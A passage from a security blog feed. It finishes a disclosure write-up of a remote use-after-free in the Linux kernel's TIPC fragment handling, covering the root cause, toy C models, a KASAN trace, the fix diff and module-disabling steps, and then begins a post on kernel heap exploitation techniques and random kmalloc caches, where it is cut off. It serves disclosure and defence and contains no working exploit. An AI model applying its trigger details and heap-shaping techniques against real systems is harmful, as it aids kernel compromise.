	}
	*buf = NULL;
	return 0;
err:
	kfree_skb(*buf);                                            [6]
	kfree_skb(*headbuf);                                        [7]
	*buf = *headbuf = NULL;
	return 0;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/msg.c#L124">net/tipc/msg.c</a> (6.7.4)</figcaption></figure><p>Walking through a typical case, when the first fragment is received, <code>tipc_buf_append()</code> is called with <code>*headbuf == NULL</code> &amp; <code>*buf</code> pointing to the packet buffer of the first fragment. Note the fragment id (first, last or other) is stored in the TIPC header [0].</p><p>For the first fragment, some checks are done and this buffer is used to initialise <code>headbuf</code> [1] and it returns. For subsequent fragments in this sequence, <code>headbuf</code> is now initialised when <code>tipc_buf_append()</code> is called. These packets are then either coalesced into the head buffer [2] or added to its <code>frag_list</code> [3].</p><p>Finally, when the <code>LAST_FRAGMENT</code> is processed and added to the chain, the header of the initially fragmented packet is validated [4]. If you recall, the fragmented message is stored within the <code>MSG_FRAGMENTER</code> messages, so it will have its own header that hasn&apos;t been validated yet.</p><p>Notably, if this fails (e.g. we intentionally scuff up the header of the fragmented message), both the buffers are dropped via the error path [5]. At this point <code>buf</code> points to the last fragment and <code>headbuf</code> points to the head buffer (the first fragment). It is possible for <code>buf</code> to be in the <code>frag_list</code> of <code>headbuf</code> at this point, as we&apos;ve seen.</p><p>However, <code>kfree_skb()</code> isn&apos;t a simple <code>kfree()</code> wrapper, due to the complexity of <code>struct sk_buff</code>. It involves quite a bit of cleanup, including cleaning up the fragments referenced by the <code>frag_list</code> ... you can probably see where this is going!</p><p>The last fragment, <code>buf</code>, is freed [6]. 
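A toy model of the two frees, using hypothetical stand-in structures rather than the real <code>sk_buff</code> internals:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">#include &lt;stdio.h&gt;

/* Hypothetical stand-ins for sk_buff and kfree_skb(); these are not
 * the real kernel structures, just the shape of the bug. */
struct fake_skb {
	struct fake_skb *next;	/* models the frag_list chaining */
	int freed;		/* models the allocator&apos;s view */
};

/* Models kfree_skb(): free the skb, then walk and free its fragment
 * list, as skb_release_data() -&gt; kfree_skb_list_reason() does. */
static void fake_kfree_skb(struct fake_skb *skb)
{
	while (skb) {
		struct fake_skb *next = skb-&gt;next; /* the UAF read */

		if (skb-&gt;freed)
			printf(&quot;use-after-free!\n&quot;);
		skb-&gt;freed = 1;
		skb = next;
	}
}

int main(void)
{
	struct fake_skb head = { 0 }, last = { 0 };

	head.next = &amp;last;	/* last fragment chained into head&apos;s list */
	fake_kfree_skb(&amp;last);	/* [6]: kfree_skb(*buf) frees the last fragment */
	fake_kfree_skb(&amp;head);	/* [7]: kfree_skb(*headbuf) walks the list and
				 * touches the already-freed fragment */
	return 0;
}</code></pre><figcaption>Hypothetical sketch of the double free, not kernel code</figcaption></figure><p>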
Then, the head buffer is freed [7], whereupon its <code>frag_list</code> is iterated for cleanup, leading to a use-after-free, as the final fragment was freed just prior to this call [6]!</p><p>We can see this by exploring the rest of the call trace when we trigger the bug:</p><pre><code>[   48.900496] ==================================================================
[   48.901414] BUG: KASAN: slab-use-after-free in kfree_skb_list_reason+0x549/0x5c0
[   48.902395] Read of size 8 at addr ffff88800927c900 by task syz_test/207
[   48.903256] 
[   48.903450] CPU: 1 PID: 207 Comm: syz_test Not tainted 6.7.4-gd09175322cfa-dirty #6
[   48.904221] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[   48.905046] Call Trace:
[   48.905306]  &lt;IRQ&gt;
[   48.905490]  dump_stack_lvl+0x72/0xa0
[   48.905787]  print_report+0xcc/0x620
[   48.906736]  kasan_report+0xb0/0xe0
[   48.907096]  kfree_skb_list_reason+0x549/0x5c0
[   48.909613]  skb_release_data.isra.0+0x4fd/0x850
[   48.909997]  kfree_skb_reason+0xf4/0x380
[   48.910171]  tipc_buf_append+0x3e4/0xad0
</code></pre><p>The site that triggers KASAN is when the fragmented buffer list is iterated during <code>kfree_skb_list_reason()</code>. It is passed the <code>frag_list</code> of the head buffer in <code>skb_release_data()</code> [0]:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">static void skb_release_data(struct sk_buff *skb, enum skb_drop_reason reason,
			     bool napi_safe)
{
	struct skb_shared_info *shinfo = skb_shinfo(skb);
	int i;

    // snip

free_head:
	if (shinfo-&gt;frag_list)
		kfree_skb_list_reason(shinfo-&gt;frag_list, reason);                       [0]
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/core/skbuff.c#L966">net/core/skbuff.c</a> (6.7.4)</figcaption></figure><p>We can then see the KASAN trigger in <code>kfree_skb_list_reason()</code> here [1]:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">void __fix_address
kfree_skb_list_reason(struct sk_buff *segs, enum skb_drop_reason reason)
{
	struct skb_free_array sa;

	sa.skb_count = 0;

	while (segs) {
		struct sk_buff *next = segs-&gt;next;                                      [1]

		if (__kfree_skb_reason(segs, reason)) {
			skb_poison_list(segs);
			kfree_skb_add_bulk(segs, &amp;sa, reason);
		}

		segs = next;
	}

	if (sa.skb_count)
		kmem_cache_free_bulk(skbuff_cache, sa.skb_count, sa.skb_array);
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/core/skbuff.c#L1140">net/core/skbuff.c</a> (6.7.4)</figcaption></figure><h3 id="variations">Variations</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/04/there-smore.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="480" height="267"></figure><p>There&apos;s a couple of variations to this vulnerability which are worth mentioning. First of all, the vulnerable path can also be reached in a very similar manner via <code>TUNNEL_PROTOCOL</code> messages, as seen in this call trace:</p><pre><code>kfree_skb_reason+0xf4/0x380 net/core/skbuff.c:1108
kfree_skb include/linux/skbuff.h:1234 [inline]
tipc_buf_append+0x3ce/0xb50 net/tipc/msg.c:186
tipc_link_tnl_rcv net/tipc/link.c:1398 [inline]
tipc_link_rcv+0x1a89/0x2dc0 net/tipc/link.c:1837
tipc_rcv+0x1220/0x3030 net/tipc/node.c:2173
tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
</code></pre><p>Additionally, some eagle eyed readers may also have noticed there&apos;s another way to trigger the use-after-free within <code>tipc_buf_append()</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
{
    // snip

    if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {
        kfree_skb_partial(frag, headstolen);                        [0]
    } else {
        tail = TIPC_SKB_CB(head)-&gt;tail;
        if (!skb_has_frag_list(head))
            skb_shinfo(head)-&gt;frag_list = frag;
        else
            tail-&gt;next = frag;
        head-&gt;truesize += frag-&gt;truesize;
        head-&gt;data_len += frag-&gt;len;
        head-&gt;len += frag-&gt;len;
        TIPC_SKB_CB(head)-&gt;tail = frag;
    }

    if (fragid == LAST_FRAGMENT) {
        TIPC_SKB_CB(head)-&gt;validated = 0;
        if (unlikely(!tipc_msg_validate(&amp;head)))
            goto err;
        *buf = head;
        TIPC_SKB_CB(head)-&gt;tail = NULL;
        *headbuf = NULL;
        return 1;
    }
    *buf = NULL;
    return 0;
err:
    kfree_skb(*buf);                                                [1]
    kfree_skb(*headbuf);                                            [2]
    *buf = *headbuf = NULL;
    return 0;
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/msg.c#L124">net/tipc/msg.c</a> (6.7.4)</figcaption></figure><p>The initial free can occur at either site [0] or [1]. We&apos;ve covered the latter case, but if the last fragment was coalesced, then the initial free occurs at [0] instead.</p><hr><ol><li><a href="http://tipc.io/protocol.html">TIPC Protocol: 7.2.7. Message Fragmentation</a></li></ol><h2 id="exploitation">Exploitation</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/07/i_failed_you.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="220" height="165"></figure><p>Unfortunately I haven&apos;t had the time to work on putting together an exploit for this vulnerability, though I&apos;d love to set some time aside in the future. Sorry! :( </p><p>From an LPE perspective, the use-after-free of a <code>struct sk_buff</code> provides a pretty nice primitive due to its complexity and usage. There have been some nice write-ups in the past making good use of the structure for LPE, so check those out if interested!<sup><a href="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-0920.html">[1]</a><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">[2]</a></sup> </p><p>The RCE side of things is more opaque and something I&apos;m really keen to explore more. Two major roadblocks for Linux kernel RCE are KASLR and the drastically reduced surface for heap feng shui and for affecting device state generally.</p><p>At least on the latter, we have some nice flexibility with this vulnerability. We have some control over the affected caches via our TIPC messages. The defer queue could potentially be used to introduce delays and control when objects are freed. 
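A toy model of that lever, assuming nothing about the real queue internals:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">#include &lt;stdio.h&gt;

/* Toy model of the tipc_link_rcv() defer queue: packets with a seqno
 * gap sit in defq until the missing seqno arrives, then the whole run
 * is delivered (and freed) in one burst. Illustrative only. */
#define NPKT 8

static int rcv_nxt = 1;
static int defq[NPKT];		/* deferred seqnos, 0 = empty slot */

static void deliver(int seqno)
{
	printf(&quot;delivered seqno %d\n&quot;, seqno);
}

static void rcv(int seqno)
{
	if (seqno != rcv_nxt) {	/* gap: defer, like __tipc_skb_queue_sorted() */
		defq[seqno % NPKT] = seqno;
		return;
	}
	deliver(seqno);
	rcv_nxt++;
	/* drain the defer queue, like the __tipc_skb_dequeue() loop */
	while (defq[rcv_nxt % NPKT] == rcv_nxt) {
		defq[rcv_nxt % NPKT] = 0;
		deliver(rcv_nxt);
		rcv_nxt++;
	}
}

int main(void)
{
	rcv(3);	/* deferred */
	rcv(2);	/* deferred */
	rcv(1);	/* fills the gap: 1, 2 and 3 all delivered at once */
	return 0;
}</code></pre><figcaption>Hypothetical sketch of deferring frees via seqno gaps, not kernel code</figcaption></figure><p>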
Who knows!</p><hr><ol><li><a href="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-0920.html">CVE-2021-0920: Android sk_buff use-after-free in Linux</a></li><li><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel</a></li></ol><p>Here are some posts on other TIPC related bugs and stuff for interested readers:</p><ol><li><a href="https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/">CVE-2021-43267: Remote Linux Kernel Heap Overflow</a> by <a href="https://twitter.com/maxpl0it">@maxpl0it</a></li><li><a href="https://haxx.in/posts/pwning-tipc/">Exploiting CVE-2021-43267</a> by <a href="https://twitter.com/bl4sty">@bl4sty</a></li><li><a href="https://sam4k.com/cve-2022-0435-a-remote-stack-overflow-in-the-linux-kernel/">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</a> by me</li></ol><h2 id="fix-remediation">Fix + Remediation </h2><figure class="kg-card kg-code-card"><pre><code>---
 net/tipc/msg.c | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/net/tipc/msg.c b/net/tipc/msg.c
index 5c9fd4791c4ba1..9a6e9bcbf69402 100644
--- a/net/tipc/msg.c
+++ b/net/tipc/msg.c
@@ -156,6 +156,11 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
 	if (!head)
 		goto err;
 
+	/* Either the input skb ownership is transferred to headskb
+	 * or the input skb is freed, clear the reference to avoid
+	 * bad access on error path.
+	 */
+	*buf = NULL;
 	if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {
 		kfree_skb_partial(frag, headstolen);
 	} else {
@@ -179,7 +184,6 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
 		*headbuf = NULL;
 		return 1;
 	}
-	*buf = NULL;
 	return 0;
 err:
 	kfree_skb(*buf);</code></pre><figcaption>Commit <a href="https://github.com/torvalds/linux/commit/080cbb890286cd794f1ee788bbc5463e2deb7c2b">080cbb890286</a>, authored by <a href="https://github.com/torvalds/linux/commits?author=kuba-moo">kuba-moo</a></figcaption></figure><p>We can see the patch is fairly simple (even if the context is not): the reference to the input skb ( <code>buf</code> ) is cleared before the error case that can cause the UAF. This is because the block handling the fragment coalescing/chaining already does the appropriate cleanup for it via <code>frag</code> (which at this point is also a reference to the input skb).</p><p>It&apos;s a bit clearer if we provide some more context:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">    /* Either the input skb ownership is transferred to headskb
     * or the input skb is freed, clear the reference to avoid
     * bad access on error path.
     */
    *buf = NULL;
    if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {  [2]
        kfree_skb_partial(frag, headstolen);                  [3]
    } else {                                                  [4]
        tail = TIPC_SKB_CB(head)-&gt;tail;
        if (!skb_has_frag_list(head))
            skb_shinfo(head)-&gt;frag_list = frag;
        else
            tail-&gt;next = frag;
        head-&gt;truesize += frag-&gt;truesize;
        head-&gt;data_len += frag-&gt;len;
        head-&gt;len += frag-&gt;len;
        TIPC_SKB_CB(head)-&gt;tail = frag;
    }

    if (fragid == LAST_FRAGMENT) {
        TIPC_SKB_CB(head)-&gt;validated = 0;
        if (unlikely(!tipc_msg_validate(&amp;head)))
            goto err;
        *buf = head;                                          [0]
        TIPC_SKB_CB(head)-&gt;tail = NULL;
        *headbuf = NULL;
        return 1;
    }
    // before the patch: *buf = NULL;                         [1]
    return 0;
err:
    kfree_skb(*buf);
    kfree_skb(*headbuf);
    *buf = *headbuf = NULL;
    return 0;
}</code></pre><figcaption>net/tipc/msg.c (it&apos;s not on elixir yet, but will link)</figcaption></figure><p>So if we recall our vulnerable case, after we&apos;ve chained our last fragment, if the TIPC header of the fragmented message (which is now assembled) is invalid, the validation check just above [0] fails. We then go to <code>err:</code> and cause the UAF, as <code>buf</code> was never cleared at [1]. </p><p>By the time we reach [2] we know that the input skb is a trailing fragment and is referenced by both <code>buf</code> and <code>frag</code>. At this point we don&apos;t need the <code>buf</code> reference as the following block handles the input skb appropriately via <code>frag</code>: either it is coalesced into <code>head</code> and freed [3] or it is added to <code>head</code>&apos;s frag list at which point <code>head</code> is responsible for it [4]. </p><p>As a result, we can just clear the unnecessary <code>buf</code> reference before it can cause any trouble. Hopefully that&apos;s not too convoluted an explanation for a simple patch!</p><h3 id="remediation">Remediation</h3><p>Chances are, as I mentioned up top, unless you&apos;re running TIPC you&apos;re all good! 
However, if you are, or want to be extra safe, prior to a patch being made available, the TIPC module can be prevented from loading if not in use:</p><ul><li><code>$ lsmod | grep tipc</code> will let you know if the module is currently loaded,</li><li><code>$ modprobe -r tipc</code> may allow you to unload the module if loaded, however you may need to reboot your system</li><li><code>$ echo &quot;install tipc /bin/true&quot; &gt;&gt; /etc/modprobe.d/disable-tipc.conf</code> will prevent the module from being loaded, which is a good idea if you have no reason to use it</li></ul><h2 id="wrapup">Wrapup </h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/04/i_think_our_work_here_is_done.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="500" height="282"></figure><p>As always, thank you for surviving up until this point! This research has been super fun, hopefully this has been an interesting read and not missing <em>too</em> much context; I appreciate it&apos;s a particularly complex topic with lots of moving parts. Also, this was somewhat rushed due to having a lot going on at the moment, so I apologise for any drop in quality!</p><p>I&apos;d like to thank ZDI and the Linux kernel maintainers for the work involved in getting this vulnerability disclosed and patched!</p><p>There&apos;s quite a few things I&apos;d love to do in follow-up to this post, if I can only find the time! 
I&apos;d be happy to go into more detail on the discovery process and working with syzkaller, I <em>really </em>want to play around with exploitation and I also think it&apos;d be neat to expand the Linternals blog series with some networking content!</p><p>In the meanwhile, if you&apos;re interested in modifying syzkaller, checkout <a href="https://x.com/notselwyn/">@notselwyn</a>&apos;s post on &quot;<a href="https://pwning.tech/ksmbd-syzkaller/#4-adding-kcov-support-to-ksmbd">Tickling ksmbd: fuzzing SMB in the Linux kernel</a>&quot;, I found it super helpful! </p><p>Feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Exploring Linux's New Random Kmalloc Caches]]></title><description><![CDATA[Let's explore the modern kernel heap exploitation meta and how the new RANDOM_KMALLOC_CACHES tries to address it.]]></description><link>https://sam4k.com/exploring-linux-random-kmalloc-caches/</link><guid isPermaLink="false">651b253092020209c38fcfed</guid><category><![CDATA[VRED]]></category><category><![CDATA[linux]]></category><category><![CDATA[linternals]]></category><category><![CDATA[memory]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Fri, 03 Nov 2023 14:10:43 GMT</pubDate><media:content url="https://sam4k.com/content/images/2023/10/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2023/10/tired_computer.gif" alt="Exploring Linux&apos;s New Random Kmalloc Caches"><p>In this post we&apos;re going to be taking a look at the state of contemporary kernel heap exploitation and how the new opt-in hardening feature added in the 6.6 Linux kernel, <code>RANDOM_KMALLOC_CACHES</code>, looks to address that.</p><p>To provide some context to the problems <code>RANDOM_KMALLOC_CACHES</code> tries to address, we&apos;ll spend a bit of time covering the current heap exploitation meta. 
This actually ended up being reasonably in-depth (oops) and touches on general approaches to exploitation as well as current mitigations and techniques such as heap feng shui, cache reuse attacks, FUSE and making use of elastic objects.</p><p>Armed with that information we&apos;ll then explore the new patch in detail, discuss how it addresses heap exploitation and have a bit of fun speculating how the meta might shift as a result of this.</p><p>As this post is focusing on kernel heap exploitation, I&apos;ll be assuming some prerequisite knowledge around topics like kernel memory allocators (luckily for you I&apos;ve written about this already in some detail as part of Linternals, <a href="https://sam4k.com/linternals-introduction/#contents">here</a>).</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#current-heap-exploitation-meta">Current Heap Exploitation Meta</a>
<ul>
<li><a href="#approaching-heap-exploitation">Approaching Heap Exploitation</a></li>
<li><a href="#current-mitigations">Current Mitigations</a></li>
<li><a href="#generic-techniques">Generic Techniques</a>
<ul>
<li><a href="#basic-heap-feng-shui">Basic Heap Feng Shui</a></li>
<li><a href="#cache-reuse-attacks">Cache Reuse Attacks</a></li>
<li><a href="#elastic-objects">Elastic Objects</a></li>
<li><a href="#fuse">FUSE</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#introducing-random-kmalloc-caches">Introducing Random Kmalloc Caches</a></li>
<li><a href="#diving-into-the-implementation">Diving Into The Implementation</a>
<ul>
<li><a href="#cache-setup">Cache Setup</a></li>
<li><a href="#seed-setup">Seed Setup</a></li>
<li><a href="#kmalloc-allocations">Kmalloc Allocations</a></li>
<li><a href="#thoughts">Thoughts</a></li>
</ul>
</li>
<li><a href="#whats-the-new-meta">What&apos;s The New Meta?</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="current-heap-exploitation-meta">Current Heap Exploitation Meta</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/need_context.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="269"></figure><p>Alright, before we dive into the juicy details, let&apos;s quickly touch on the current state of heap exploitation to help us understand why this patch was added and how it affects things!</p><p>Heap corruption is one of the more common types of bugs found in the kernel today (think use-after-free, heap overflow etc.). When we talk about heap corruption in the Linux kernel, we&apos;re referring to memory dynamically allocated via the slab allocator (e.g. <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590">kmalloc()</a></code>) or directly via the page allocator (e.g. <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/gfp.h#L269">alloc_pages()</a></code>).</p><p>The fundamental goal of exploitation is to leverage our heap corruption to gain more control over the system, typically to elevate our privileges or at least get closer to being able to do so.</p><p>In reality, these heap corruptions can come in all shapes and sizes. The objects we&apos;re able to use-after-free can come from different caches, there may be a race involved, there may be fields which need to be specific values etc. Similarly, our overflows can also have any number of constraints which impact our approach to leveraging the corruption.</p><p>However, there exist a number of generic techniques for heap exploitation, which help cut down on the time needed to go from heap corruption to working exploit. As we know, security is a cat and mouse game, so these techniques are continually adapting to keep up with new mitigations. 
</p><p>From a defender&apos;s perspective, in an ideal world we would mitigate heap corruption bugs entirely. Failing that, we can make it as hard as possible for attackers to leverage any heap corruption bugs they do find. Responding to the generic techniques used by attackers is a good way to go about this, forcing each bug to require a bespoke approach to exploit.</p><h3 id="approaching-heap-exploitation">Approaching Heap Exploitation </h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/i_want_details.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Okay, with the exposition out of the way, let&apos;s talk a bit about how we might go about exploiting a heap corruption in the kernel nowadays. I&apos;m going to (try to) keep things fairly high level, with a focus on the slab allocator side of things due to the topic&apos;s context.</p><p>So first things first, we want to make sure we understand the bug itself: how do we reach it, what kernel configurations or capabilities do we require? What is the nature of the corruption, is it a use-after-free? What are the limitations around triggering the bug? What data structures are affected, what are the risks of a kernel panic?</p><p>Then we want to get into the specifics of the heap corruption itself. How are the affected objects allocated? Is it via the slab allocator or the page allocator? For slab allocations, we&apos;re interested in what cache the object is allocated to, so we can infer what other objects share the same cache and can potentially be corrupted. </p><p>There are several factors to consider at the moment when determining what cache our object will end up in:</p><ul><li><strong>The API used</strong> will tell us if it&apos;s allocated into a general purpose cache with other similar sized objects (<code>kmalloc()</code>, <code>kzalloc()</code>, <code>kcalloc()</code> etc.) 
or private cache ( <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L499">kmem_cache_alloc()</a></code>) with slabs containing only objects of that type.</li><li><strong>The GFP (Get Free Page) flags </strong>used can tell us which of the general purpose cache types the object is allocated to. By default, allocations will go to the standard general purpose caches, <code>kmalloc-x</code>, where x is the &quot;bucket size&quot;. The other common case is <code>GFP_KERNEL_ACCOUNT</code>, typically used for untrusted allocations<sup><a href="https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst">[1]</a></sup>, which will put objects in an accounted cache, named <code>kmalloc-cg-x</code>. </li><li><strong>The size of the object</strong> will determine, for general purpose caches, which &quot;bucket size&quot; the object will end up in. The <code>x</code> in <code>kmalloc-x</code> denotes the fixed size in bytes allocated to each object in the cache&apos;s slabs. Objects will be allocated into the smallest general purpose cache they can fit into. </li></ul><p>Now that we&apos;ve built up an understanding of the bug and how it&apos;s allocated, it&apos;s time to think about how we want to use our corruption. By knowing what cache our object is in, we know what other objects can or can&apos;t be allocated into the same slab.</p><p>The general goal here is to find a viable object to corrupt. We can use our understanding of how the slab allocator works in order to shape the layout of memory to make this more reliable, or to make otherwise incorruptible objects corruptible. 
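The bucket selection described above can be sketched as follows (illustrative sizes, not a real kernel&apos;s cache list):</p><figure class="kg-card kg-code-card"><pre><code class="language-c">#include &lt;stdio.h&gt;

/* Sketch of the general purpose cache selection rules above. The
 * bucket list is illustrative, not pulled from a real kernel config. */
static const int buckets[] = { 8, 16, 32, 64, 96, 128, 192, 256 };

/* Hypothetical helper: name the general purpose cache a
 * kmalloc(size, flags) allocation lands in; &apos;accounted&apos; models
 * GFP_KERNEL_ACCOUNT. */
static void cache_for(int size, int accounted)
{
	for (unsigned i = 0; i &lt; sizeof(buckets) / sizeof(buckets[0]); i++) {
		if (size &lt;= buckets[i]) {
			printf(accounted ? &quot;kmalloc-cg-%d\n&quot;
					 : &quot;kmalloc-%d\n&quot;, buckets[i]);
			return;
		}
	}
	printf(&quot;beyond the kmalloc buckets\n&quot;);
}

int main(void)
{
	cache_for(24, 0);	/* smallest bucket that fits: kmalloc-32 */
	cache_for(24, 1);	/* same size, accounted: kmalloc-cg-32 */
	cache_for(100, 0);	/* kmalloc-128 */
	return 0;
}</code></pre><figcaption>Hypothetical sketch of cache selection, not kernel code</figcaption></figure><p>So, for example, a 24 byte allocation with <code>GFP_KERNEL_ACCOUNT</code> shares <code>kmalloc-cg-32</code> slabs with every other accounted object of up to 32 bytes.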
</p><h3 id="current-mitigations">Current Mitigations</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/wait_wait_wait.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="400" height="400"></figure><p>However, before we get ahead of ourselves, we first have to consider any mitigations that might impact our ability to exploit our bug on modern systems. This won&apos;t be an exhaustive list, but will help provide some context on the current meta:</p><ul><li><code><a href="https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_HARDENED.html">CONFIG_SLAB_FREELIST_HARDENED</a></code> adds checks to protect slab metadata, such as the freelist pointers stored in free objects within a SLUB slab, as well as checks for double-frees.</li><li><code><a href="https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html">CONFIG_SLAB_FREELIST_RANDOM</a></code> randomises the freelist order when a new cache slab is allocated, such that an attacker can&apos;t infer the order objects within that slab will be filled. The aim is to reduce the knowledge &amp; control attackers have over heap state.</li><li><code><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html">CONFIG_STATIC_USERMODEHELPER</a></code> mitigates a popular technique for leveraging heap corruption, which we&apos;ll touch on in the next section.</li><li>Slab merging, enabled via <code>slub_merge</code> bootarg or <code>CONFIG_SLAB_MERGE_DEFAULT=y</code>, allows slab caches to be merged for performance. As you can imagine, this is nice for attackers as it opens up our options for corruption. 
</li><li>Some others, which are less commonly enabled afaik, or out of scope, include <code><a href="https://cateee.net/lkddb/web-lkddb/SHUFFLE_PAGE_ALLOCATOR.html">CONFIG_SHUFFLE_PAGE_ALLOCATOR</a></code>, <code><a href="https://cateee.net/lkddb/web-lkddb/CFI_CLANG.html">CONFIG_CFI_CLANG</a></code>, <code>init_on_alloc</code> / <code><a href="https://cateee.net/lkddb/web-lkddb/INIT_ON_ALLOC_DEFAULT_ON.html">CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y</a></code> &amp; <code>init_on_free</code> / <code><a href="https://cateee.net/lkddb/web-lkddb/INIT_ON_FREE_DEFAULT_ON.html">CONFIG_INIT_ON_FREE_DEFAULT_ON=y</a></code>.</li></ul><h3 id="generic-techniques">Generic Techniques</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/the_good_part.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Okay, now we&apos;re ready to start pwning the heap. We understand our bug, the allocation context and the kind of mitigations we&apos;re dealing with. Let&apos;s explore some contemporary techniques used to get around these mitigations and exploit heap corruption bugs!</p><h4 id="basic-heap-feng-shui">Basic Heap Feng Shui</h4><p>A fundamental aspect of heap corruption is the ability to shape the heap, commonly referred to as &quot;heap feng shui&quot;. We can use our understanding of how the allocator works and the mitigations in place to try to get things where we want them in the heap.</p><p>Let&apos;s use a generic heap overflow to demonstrate this. We can overflow object <code>x</code> and we want to corrupt object <code>y</code>. They&apos;re in the same generic cache, so our goal is to land <code>y</code> adjacent to <code>x</code> in the same slab. </p><p>We want to consider how active the cache is (aka cache noise) and up-time, as this will give us an idea of the cache slab state. 
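The first two steps of the approach below can be simulated with a toy slab model (illustrative only; real slab state is far noisier):</p><figure class="kg-card kg-code-card"><pre><code class="language-c">#include &lt;stdio.h&gt;

/* Toy slab model for the feng shui steps that follow: &apos;x&apos; marks an
 * in-use object, &apos;.&apos; a free slot. Allocations fill existing partial
 * slabs before touching fresh ones. Purely illustrative. */
#define SLOTS 4

static char slabs[4][SLOTS + 1] = { &quot;x.x.&quot;, &quot;..x.&quot;, &quot;....&quot;, &quot;....&quot; };

static void alloc_y(void)
{
	for (int s = 0; s &lt; 4; s++)
		for (int i = 0; i &lt; SLOTS; i++)
			if (slabs[s][i] == &apos;.&apos;) {
				slabs[s][i] = &apos;y&apos;;
				return;
			}
}

int main(void)
{
	/* step 1: plug the 5 holes in the partial slabs,
	 * step 2: spray two fresh slabs full of object y */
	for (int n = 0; n &lt; 13; n++)
		alloc_y();
	for (int s = 0; s &lt; 4; s++)
		printf(&quot;slab %d: %s\n&quot;, s, slabs[s]);
	return 0;
}</code></pre><figcaption>Hypothetical sketch of the fill-then-spray strategy</figcaption></figure><p>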
On a typical workload with a fairly busy cache, we can assume there are likely to be several partially filled slabs; this is our starting state.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/1_partial_slabs.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="971" height="332" srcset="https://sam4k.com/content/images/size/w600/2023/10/1_partial_slabs.png 600w, https://sam4k.com/content/images/2023/10/1_partial_slabs.png 971w" sizes="(min-width: 720px) 720px"></figure><p>A basic heap feng shui approach would be to first allocate a number of object <code>y</code> to fill up the holes in the partial slabs:</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/2_filled_partials.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="1019" height="332" srcset="https://sam4k.com/content/images/size/w600/2023/10/2_filled_partials.png 600w, https://sam4k.com/content/images/size/w1000/2023/10/2_filled_partials.png 1000w, https://sam4k.com/content/images/2023/10/2_filled_partials.png 1019w" sizes="(min-width: 720px) 720px"></figure><p>Then, we allocate several slabs worth of object <code>y</code>, which we can assume will trigger new slabs to be allocated, hopefully filled with object <code>y</code>:</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/3_filled_new_slabs.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc 